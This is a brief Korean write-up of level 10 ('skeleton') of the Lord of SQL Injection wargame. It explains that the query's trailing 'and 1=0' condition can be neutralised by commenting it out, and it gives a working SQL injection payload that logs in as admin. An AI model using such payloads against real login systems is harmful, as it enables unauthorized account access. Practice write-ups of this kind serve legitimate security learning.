본문 바로가기

Write-Up/LOS (lord of sql injection)

[Lord of SQL Injection] 10번 skeleton

pw뒤 and 1=0이니 항상 거짓이다.

and 1=0 이부분을 주석으로 처리해주면 될 것 같다

 

payload : ?pw=1' or '1' = '1' and id='admin'%23